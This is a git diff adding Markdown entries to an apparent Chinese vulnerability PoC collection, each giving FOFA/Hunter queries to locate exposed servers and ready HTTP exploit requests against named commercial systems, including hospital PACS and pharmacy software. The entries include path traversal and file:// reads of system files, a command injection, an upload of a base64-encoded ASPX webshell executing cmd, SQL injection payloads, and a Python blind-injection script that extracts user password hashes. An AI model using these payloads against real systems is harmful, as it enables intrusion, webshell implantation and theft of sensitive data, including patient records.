+![8fe957553635d968043dff547bca65ce](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410131410574.png)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/kRCNBIbWvgdJ1BLWl31SYQ
diff --git a/艾科思（霆智科技）应用接入系统存在任意文件读取漏洞.md b/艾科思（霆智科技）应用接入系统存在任意文件读取漏洞.md
new file mode 100644
index 0000000..086b691
--- /dev/null
+++ b/艾科思（霆智科技）应用接入系统存在任意文件读取漏洞.md
@@ -0,0 +1,30 @@
+# 艾科思（霆智科技）应用接入系统存在任意文件读取漏洞
+
+# 一、漏洞简介
+艾科思应用接入系统(霆智科技的VA虚拟应用平台)是一个创新的技术平台，旨在为用户提供虚拟助手（Virtual Assistant）的功能和服务。虚拟助手是一种人工智能系统，通过自然语言处理、机器学习和其他相关技术，能够与用户进行对话，并执行各种任务和服务。该系统存在任意文件读取漏洞
+
+# 二、影响版本
++ 艾科思应用接入系统(霆智科技的VA虚拟应用平台
+
+# 三、资产测绘
++ fofa`body="EAA益和应用接入系统"`
++ 特征
+
+![1696134097313-5de6d021-a63d-484a-a589-463d433d0311.png](./img/3KpyFjAQUmuFS8mN/1696134097313-5de6d021-a63d-484a-a589-463d433d0311-434273.png)
+
+# 四、漏洞复现
+```plain
+GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate Connection: keep-alive
+```
+
+![1696134155798-c4e50cfe-ddcf-4a0a-94c0-1490816c96a8.png](./img/3KpyFjAQUmuFS8mN/1696134155798-c4e50cfe-ddcf-4a0a-94c0-1490816c96a8-405843.png)
+
+
+
+> 更新: 2024-02-29 23:55:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fi90duzlpyhfdgtx>
\ No newline at end of file
diff --git a/苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞.md b/苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞.md
new file mode 100644
index 0000000..41e2dca
--- /dev/null
+++ b/苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞.md
@@ -0,0 +1,35 @@
+# 苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞
+
+# 一、漏洞简介
+苏州科达科技股份有限公司多媒体录播系统存在信息泄露漏洞
+
+# 二、影响版本
+多媒体录播系统
+
+# <font style="color:rgb(51, 51, 51);">三、资产测绘</font>
++ fofa`body="kedaname" || body="KEDACOM" || body="www.kedacom.com" || body="科达多媒体录播系统"`
++ 特征
+
+![1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65.png](./img/VGSRQytOV8lBTDzI/1732672177570-ed8fba35-95c1-4ef3-8574-06fdfec6bb65-330998.png)
+
+# 四、漏洞复现
+```plain
+POST /fcgi-bin/vrswebinterpreter.fcgi HTTP/1.1
+Host: 
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 333
+
+{"msgid":3061,"usermoid":"11111111-11111111-11111111-11111111","userdomainmoid":"11111111-11111111-11111111-11111111","rightmask":268435455,"content":{"userdomainmoid":"","StartPos":0,"EndPos":14,"IncludeName":""}}
+```
+
+![1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1.png](./img/VGSRQytOV8lBTDzI/1732672209962-92d83e90-ec83-4f79-bd10-31b2bd38a8e1-754019.png)
+
+
+
+> 更新: 2024-11-27 10:00:05  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qwngpamuavad9xcl>
\ No newline at end of file
diff --git a/英飞达医学WebUserLogin.asmx信息泄露.md b/英飞达医学WebUserLogin.asmx信息泄露.md
new file mode 100644
index 0000000..06949a4
--- /dev/null
+++ b/英飞达医学WebUserLogin.asmx信息泄露.md
@@ -0,0 +1,21 @@
+# 英飞达医学WebUserLogin.asmx信息泄露
+
+## fofa
+
+```javascript
+icon_hash="1474455751" || icon_hash="702238928"
+```
+
+## poc
+
+```javascript
+GET /webservices/WebUserLogin.asmx/GetUserInfoByUserID?userID=admin HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+```
+
+![image-20241018160036699](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410181600771.png)
\ No newline at end of file
diff --git a/英飞达影像存档与通讯(PACS)系统INFINITTPACSWebJobUpload存在任意文件上传漏洞.md b/英飞达影像存档与通讯(PACS)系统INFINITTPACSWebJobUpload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..91c4767
--- /dev/null
+++ b/英飞达影像存档与通讯(PACS)系统INFINITTPACSWebJobUpload存在任意文件上传漏洞.md
@@ -0,0 +1,47 @@
+# 英飞达影像存档与通讯(PACS)系统INFINITT PACS WebJobUpload存在任意文件上传漏洞
+
+# 一、漏洞简介
+英飞达是一家专业开发医学影像系统的公司，成立于1994年，早年PACS产品双子星：EFILM和PiviewSTAR，其中PiviewSTAR为我公司产品。2011年于KOSDAQ上市。产品覆盖放射、超声、内镜、病理、电生理、放疗等所有检查医技科室，生态支持单院区、多院区、区域、医联体、集团化、移动端、云端、互联网应用。客户数量多，全球6000多客户的选择，美国中小医院KLAS排第一，台湾前二，日本前三，另有德国，英国，中东，巴西，东南亚等多个地区设有分公司。中国三甲医院数量前三，西南、西北区优质客户数量第一。INFINITT PACS WebJobUpload接口存在任意文件上传漏洞 ，攻击者可通过该漏洞获取服务器权限，严重甚至导致医院的敏感病人数据泄露。
+
+# 二、影响版本
++ 英飞达影像存档与通讯(PACS)系统INFINITT PACS
+
+# 三、资产测绘
++ hunter`web.icon="0cd46e0cba3abd067cd28e70eb7f2a5f"`
++ 特征
+
+![1710050678798-3d2b7109-13a0-46c1-aa6a-f84048d5ce82.png](./img/8DdfWo-hBXKeoTtD/1710050678798-3d2b7109-13a0-46c1-aa6a-f84048d5ce82-135359.png)
+
+# 四、漏洞复现
+```plain
+POST /webservices/WebJobUpload.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://rainier/jobUpload"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+<soap:Body>
+<jobUpload xmlns="http://rainier">
+<vcode>1</vcode>
+<subFolder></subFolder>
+<fileName>2.aspx</fileName>
+<bufValue>MTIz</bufValue>
+</jobUpload>
+</soap:Body>
+</soap:Envelope>
+```
+
+![1710050894692-a465d756-5bf4-4db3-88b1-7c5c27a607f8.png](./img/8DdfWo-hBXKeoTtD/1710050894692-a465d756-5bf4-4db3-88b1-7c5c27a607f8-425462.png)
+
+```plain
+/1/2.aspx
+```
+
+![1710050917663-a92660df-3fce-4504-a866-51789deb2860.png](./img/8DdfWo-hBXKeoTtD/1710050917663-a92660df-3fce-4504-a866-51789deb2860-606481.png)
+
+
+
+> 更新: 2024-05-15 15:36:03  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wu6h6bbwq3zx751r>
\ No newline at end of file
diff --git a/苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞.md b/苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞.md
new file mode 100644
index 0000000..0be4bb5
--- /dev/null
+++ b/苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞.md
@@ -0,0 +1,24 @@
+# 苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞
+
+苹果IOS端IPA签名工具Sign.php前台任意命令执行漏洞，可能导致攻击者任意上传文件，控制服务器权限。
+
+## fofa
+
+```javascript
+body="/assets/index/css/mobileSelect.css"
+```
+
+## poc
+
+```javascript
+GET /api/sign/sign?udidres[0][sjskg]=1&noinject[name]=a&ttname=1&udid=1&appname=1&appid=a&appicon=1&apppath=|id>2.txt|&p12path=1&mppath=1&appbid=1&ipaPath=1&gm=0&filesPath=1&rm=1&app_name=1 HTTP/1.1
+Host: 127.0.0.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241107115421829](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411071154927.png)
\ No newline at end of file
diff --git a/苹果IOS端IPA签名工具request_post任意文件读取漏洞 2.md b/苹果IOS端IPA签名工具request_post任意文件读取漏洞 2.md
new file mode 100644
index 0000000..4df1187
--- /dev/null
+++ b/苹果IOS端IPA签名工具request_post任意文件读取漏洞 2.md	
@@ -0,0 +1,20 @@
+# 苹果IOS端IPA签名工具request_post任意文件读取漏洞
+
+苹果IOS端IPA签名工具request_post任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+## fofa
+
+```javascript
+body="/assets/index/css/mobileSelect.css"
+```
+
+## poc
+
+```javascript
+GET /api/index/request_post?url=file:///etc/passwd&post_data=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Connection: close
+```
+
+![image-20240926101437457](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409261014514.png)
\ No newline at end of file
diff --git a/苹果IOS端IPA签名工具request_post任意文件读取漏洞.md b/苹果IOS端IPA签名工具request_post任意文件读取漏洞.md
new file mode 100644
index 0000000..7a5e085
--- /dev/null
+++ b/苹果IOS端IPA签名工具request_post任意文件读取漏洞.md
@@ -0,0 +1,30 @@
+# 苹果IOS端IPA签名工具request_post任意文件读取漏洞
+
+# 一、漏洞简介
+苹果IOS端IPA签名工具request_post任意文件读取漏洞，可能导致敏感信息泄露、数据盗窃及其他安全风险，从而对系统和用户造成严重危害。
+
+# 二、影响版本
++ 苹果IOS端IPA签名工具r
+
+# 三、资产测绘
++ fofa`body="/assets/index/css/mobileSelect.css"`
++ 特征
+
+![1727408181627-7dd57a7d-22a5-477e-b7c2-290f545d0933.png](./img/b5h66i7l2NQvoD5j/1727408181627-7dd57a7d-22a5-477e-b7c2-290f545d0933-666408.png)
+
+# 四、漏洞复现
+```java
+GET /api/index/request_post?url=file:///etc/passwd&post_data=1 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+Connection: close
+```
+
+![1727408257756-4dc51a62-813c-4540-b5bb-8260cd03159d.png](./img/b5h66i7l2NQvoD5j/1727408257756-4dc51a62-813c-4540-b5bb-8260cd03159d-058160.png)
+
+
+
+
+
+> 更新: 2024-10-22 09:36:08  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/haxm2dna8vo9em9h>
\ No newline at end of file
diff --git a/药业管理软件UploadFile文件上传漏洞.md b/药业管理软件UploadFile文件上传漏洞.md
new file mode 100644
index 0000000..df277a5
--- /dev/null
+++ b/药业管理软件UploadFile文件上传漏洞.md
@@ -0,0 +1,34 @@
+# 药业管理软件UploadFile文件上传漏洞
+
+药业管理软件 XSDService.asmx 接口UploadFile实例存在文件上传漏洞，未经身份攻击者可通过该漏洞在服务器端任意执行代码。
+
+
+## fofa
+```javascript
+body="XSDService.asmx"
+```
+
+## poc
+```javascript
+POST /XSDService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/UploadFile"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <UploadFile xmlns="http://tempuri.org/">
+      <filePath>2</filePath>
+      <fileName>rce.aspx</fileName>
+      <buffer>PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiIHZhbGlkYXRlUmVxdWVzdD0iZmFsc2UiICU+CjwlCnZhciBjPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2Vzc1N0YXJ0SW5mbygiY21kIik7CnZhciBlPW5ldyBTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcygpOwp2YXIgb3V0OlN5c3RlbS5JTy5TdHJlYW1SZWFkZXIsRUk6U3lzdGVtLklPLlN0cmVhbVJlYWRlcjsKYy5Vc2VTaGVsbEV4ZWN1dGU9ZmFsc2U7CmMuUmVkaXJlY3RTdGFuZGFyZE91dHB1dD10cnVlOwpjLlJlZGlyZWN0U3RhbmRhcmRFcnJvcj10cnVlOwplLlN0YXJ0SW5mbz1jOwpjLkFyZ3VtZW50cz0iL2MgIiArIFJlcXVlc3QuSXRlbVsiY21kIl07CmUuU3RhcnQoKTsKb3V0PWUuU3RhbmRhcmRPdXRwdXQ7CkVJPWUuU3RhbmRhcmRFcnJvcjsKZS5DbG9zZSgpOwpSZXNwb25zZS5Xcml0ZShvdXQuUmVhZFRvRW5kKCkgKyBFSS5SZWFkVG9FbmQoKSk7ClN5c3RlbS5JTy5GaWxlLkRlbGV0ZShSZXF1ZXN0LlBoeXNpY2FsUGF0aCk7ClJlc3BvbnNlLkVuZCgpOyU+</buffer>
+      <Offset>1</Offset>
+    </UploadFile>
+  </soap:Body>
+</soap:Envelope>
+```
+
+![image-20250103185234603](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501031852686.png)
+
+文件路径：/Upload2015/2/rce.aspx?cmd=dir
\ No newline at end of file
diff --git a/药业管理软件XSDService.asmx存在SQL注入漏洞.md b/药业管理软件XSDService.asmx存在SQL注入漏洞.md
new file mode 100644
index 0000000..ee487bc
--- /dev/null
+++ b/药业管理软件XSDService.asmx存在SQL注入漏洞.md
@@ -0,0 +1,68 @@
+# 药业管理软件XSDService.asmx存在SQL注入漏洞
+
+《黄药师》药业管理软件是一款针对我国医药或医疗器械企业经营管理特点而设计的综合管理软件。《黄药师》系列管理软件集进销存、财务、经营分析和GSP管理为一体，从企业经营的各个环节对资金流、物流、信息流等进行系统的管理。它采用“一看就懂，一学就会，一用就灵”的开发理念，人机界面友好，易学易用，能满足各类零售药店、连锁配送药店、批发公司以及集团化企业、事业行政单位、大型企业和中小型企业的业务管理需要。
+
+## fofa
+
+```javascript
+body="XSDService.asmx"
+```
+
+## poc
+
+```javascript
+POST /XSDService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/GetPdaTable"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <GetPdaTable xmlns="http://tempuri.org/">
+      <sql>;WAITFOR DELAY '0:0:5'--</sql>
+    </GetPdaTable>
+  </soap:Body>
+</soap:Envelope>
+```
+
+```xml
+POST /XSDService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/ExecPdaSql"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <ExecPdaSql xmlns="http://tempuri.org/">
+      <sql>;WAITFOR DELAY '0:0:5'--</sql>
+    </ExecPdaSql>
+  </soap:Body>
+</soap:Envelope>
+```
+
+```xml
+POST /XSDService.asmx HTTP/1.1
+Host: 
+Content-Type: text/xml; charset=utf-8
+Content-Length: length
+SOAPAction: "http://tempuri.org/SetMedia_Picture_info"
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <SetMedia_Picture_info xmlns="http://tempuri.org/">
+      <info_id>1';WAITFOR DELAY '0:0:5'--</info_id>
+      <info_file_name>string</info_file_name>
+      <info_data>base64Binary</info_data>
+    </SetMedia_Picture_info>
+  </soap:Body>
+</soap:Envelope>
+```
+
+
+
+![image-20241128094249866](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280943235.png)
\ No newline at end of file
diff --git a/荷花商品混凝土ERP系统DictionaryEdit.aspx页面存在SQL注入.md b/荷花商品混凝土ERP系统DictionaryEdit.aspx页面存在SQL注入.md
new file mode 100644
index 0000000..66a6c5a
--- /dev/null
+++ b/荷花商品混凝土ERP系统DictionaryEdit.aspx页面存在SQL注入.md
@@ -0,0 +1,31 @@
+# 荷花商品混凝土ERP系统DictionaryEdit.aspx 页面存在SQL注入
+
+# 一、漏洞简介
+杭州荷花软件有限公司开发的商混ERP系统。这套系统主要是处理建筑公司或者各项工程的搅拌站管理，内部含有销售模块、生产管理模块、实验室模块、人员管理等，该公司的商品混凝土ERP系统/Sys/DictionaryEdit.aspx处dict_key参数存在SQL报错注入漏洞，攻击者可通过该漏洞获取数据库权限。
+
+# 二、影响版本
++ 荷花商品混凝土ERP系统
+
+# 三、资产测绘
++ hunter`app.name=="荷花商品混凝土ERP系统"`
++ 特征
+
+![1700038673461-c08709af-de7f-4bcf-b3c8-aa5dda30d94b.png](./img/J81dH0tJ3we7JtSC/1700038673461-c08709af-de7f-4bcf-b3c8-aa5dda30d94b-115449.png)
+
+# 四、漏洞复现
+```plain
+/Sys/DictionaryEdit.aspx?dict_key=1
+```
+
+出现如下页面大概率存在该漏洞
+
+![1700038780840-29a40f07-46cc-42c4-a145-2e84c2f63ca8.png](./img/J81dH0tJ3we7JtSC/1700038780840-29a40f07-46cc-42c4-a145-2e84c2f63ca8-492785.png)
+
+sqlmap
+
+![1700038797493-de6b792b-3f04-4aa0-aeb7-6008e0cc67d9.png](./img/J81dH0tJ3we7JtSC/1700038797493-de6b792b-3f04-4aa0-aeb7-6008e0cc67d9-532453.png)
+
+
+
+> 更新: 2024-02-29 23:55:45  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zf12hiwuxxr5b0hp>
\ No newline at end of file
diff --git a/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md b/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md
new file mode 100644
index 0000000..dde9a1f
--- /dev/null
+++ b/蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞.md
@@ -0,0 +1,166 @@
+# 蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞
+
+蓝凌EKP系统fsscCommonPortlet.do存在未授权SQL注入漏洞，未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息。
+
+## fofa
+```javascript
+app="Landray-OA系统"
+```
+
+## poc
+
+访问save方法，填充一下数据库
+
+```javascript
+POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 76
+
+method=saveICare&fdId=&fdNum=1&docSubject=1&fdName=1&createTime=1&fdStatus=1
+```
+
+```javascript
+POST /ekp/fssc/common/fssc_common_portlet/fsscCommonPortlet.do HTTP/1.1
+Host: 
+Pragma: no-cache
+Cache-Control: no-cache
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 60
+
+method=getICareByFdId&fdNum=asdasd'+or+'1'='1&ordertype=down
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240962.png)
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412272240942.png)
+
+
+
+## Python脚本
+
+```python
+import argparse
+
+import requests
+
+header = {
+    "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
+}
+
+
+def exploit_user(url,db_user):
+    global header
+    user_name = ""
+    for i in range(1, 20):
+        low = 1
+        top = 255
+        mid = (low + top) // 2
+        while low < top:
+            send_data = {
+                "method": "getICareByFdId",
+                "ordertype": "down",
+                "fdNum": "aNsSl' or ascii(substring((user_name()),{},1)) < {} and '1'='1".format(
+                    i, mid)
+            }
+            res = requests.post(url, data=send_data, headers=header)
+            if "docSubject" in res.text:
+                top = mid
+            else:
+                low = mid + 1
+            mid = (top + low) // 2
+        if mid <= 1 or mid >= 254:
+            break
+        user_name = user_name + chr(mid - 1)
+        print("[+]user_name:{}".format(user_name))
+        print("\033[F", end="")
+    print("[+]user_name:{}".format(user_name))
+def exploit(url,username):
+    global header
+    password_len = 32
+    password = ""
+    for i in range(1,password_len+1):
+        low = 1
+        top = 255
+        mid = (low + top) // 2
+        while low < top:
+            send_data = {
+                "method": "getICareByFdId",
+                "ordertype": "down",
+                "fdNum": "aNsSl' or ascii(substring((select fdPassword from com.landray.kmss.sys.organization.model.SysOrgPerson where fdLoginName='{}'),{},1)) < {} and '1'='1".format(
+                    username,i, mid)
+            }
+            res = requests.post(url,data=send_data,headers=header)
+            if "docSubject" in res.text:
+                top = mid
+            else:
+                low = mid + 1
+            mid = (top + low) // 2
+        password = password + chr(mid-1)
+        print("[+]password:{}".format(password))
+        print("\033[F",end="")
+    print("[+]password:{}".format(password))
+
+def scan_vuln(url,username,db_user):
+    global header
+    req_url = url.strip("/") + "/fssc/common/fssc_common_portlet/fsscCommonPortlet.do"
+
+    step_data = {
+        "method":"saveICare",
+        "fdId:"","
+        "fdNum":"1",
+        "docSubject":"1",
+        "fdName":"test",
+        "createTime":"1",
+        "fdStatus":"1"
+    }
+    try:
+        req1 = requests.post(req_url,data=step_data,headers=header)
+        if req1.status_code == 200 and "result" in req1.text:
+            print("[+]Vuln exist，start inject password:")
+            if db_user == "check":
+                exploit_user(req_url,db_user)
+            else:
+                exploit(req_url,username)
+        else:
+            print("[-]Vuln not exist.")
+            exit(0)
+    except:
+        print("[-]request error.")
+        exit(0)
+        pass
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Process command line arguments")
+    parser.add_argument('-u', '--url', required=True, help='Target URL')
+    parser.add_argument('-db_user', '--db_user', required=False, help='db_user')
+    parser.add_argument('-U', '--username', required=False, help='Username argument')
+
+    args = parser.parse_args()
+
+    url = args.url
+    db_user = args.db_user
+    username = args.username
+    scan_vuln(url, username, db_user)
+
+
+if __name__ == '__main__':
+    main()
+```
+
+## 漏洞来源
+
+- https://xz.aliyun.com/t/16103?time__1311=GuD%3D7KiK0KYIx05DK7qCuxWuEoT6PGC4E8eD
\ No newline at end of file
diff --git a/蓝凌EKP系统任意文件读取漏洞集合.md b/蓝凌EKP系统任意文件读取漏洞集合.md
new file mode 100644
index 0000000..3b9b094
--- /dev/null
+++ b/蓝凌EKP系统任意文件读取漏洞集合.md
@@ -0,0 +1,235 @@
+# 蓝凌EKP系统任意文件读取漏洞集合
+
+蓝凌OA webservice服务多处 接口存在任意文件读取漏洞
+
+## fofa
+
+```javascript
+body="Com_Parameter"
+```
+
+## poc1
+
+```javascript
+POST /sys/webservice/sysTagWebService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+Connection: close
+Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
+SOAPAction: ""
+Accept-Encoding: gzip, deflate
+
+------4upt9dwdca8rtwq9osuz
+Content-Disposition: form-data; name="a"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.tag.sys.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
+    <web:getGroups>
+        <arg0>
+            <beginTimeStamp>a</beginTimeStamp>
+            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
+        </arg0>
+    </web:getGroups>
+</soapenv:Body>
+</soapenv:Envelope>
+------4upt9dwdca8rtwq9osuz--
+```
+
+## poc2
+
+```javascript
+POST /sys/webservice/sysNotifyTodoWebService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+Connection: close
+Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
+SOAPAction: ""
+Accept-Encoding: gzip, deflate
+
+------4upt9dwdca8rtwq9osuz
+Content-Disposition: form-data; name="a"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.notify.sys.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
+    <web:getTodoCount>
+        <arg0>
+            <beginTimeStamp>a</beginTimeStamp>
+            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
+        </arg0>
+    </web:getTodoCount>
+</soapenv:Body>
+</soapenv:Envelope>
+------4upt9dwdca8rtwq9osuz--
+```
+
+## poc3
+
+```javascript
+POST /sys/webservice/kmImeetingBookWebService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+Connection: close
+Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
+SOAPAction: ""
+Accept-Encoding: gzip, deflate
+
+------4upt9dwdca8rtwq9osuz
+Content-Disposition: form-data; name="a"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.imeeting.km.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
+    <web:getImeetingBookLists>
+        <arg0>
+            <beginTimeStamp>a</beginTimeStamp>
+            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
+        </arg0>
+    </web:getImeetingBookLists>
+</soapenv:Body>
+</soapenv:Envelope>
+------4upt9dwdca8rtwq9osuz--
+```
+
+## poc4
+
+```javascript
+POST /sys/webservice/kmImeetingResWebService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+Connection: close
+Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
+SOAPAction: ""
+Accept-Encoding: gzip, deflate
+
+------4upt9dwdca8rtwq9osuz
+Content-Disposition: form-data; name="a"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://webservice.imeeting.km.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
+    <web:getKmimeetingResById>
+        <arg0>
+            <beginTimeStamp>a</beginTimeStamp>
+            <count><xop:Include xmlns:xop="http://www.w3.org/2004/08/xop/include" href="file:///C:/Windows/win.ini"/></count>
+        </arg0>
+    </web:getKmimeetingResById>
+</soapenv:Body>
+</soapenv:Envelope>
+------4upt9dwdca8rtwq9osuz--
+```
+
+## poc5
+
+```javascript
+POST /sys/webservice/loginWebserviceService HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
+Connection: close
+Content-Type: multipart/related; boundary=----4upt9dwdca8rtwq9osuz
+SOAPAction: ""
+Accept-Encoding: gzip, deflate
+
+------4upt9dwdca8rtwq9osuz
+Content-Disposition: form-data; name="a"
+
+<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="http://sso.authentication.sys.kmss.landray.com/">
+<soapenv:Header/>
+<soapenv:Body>
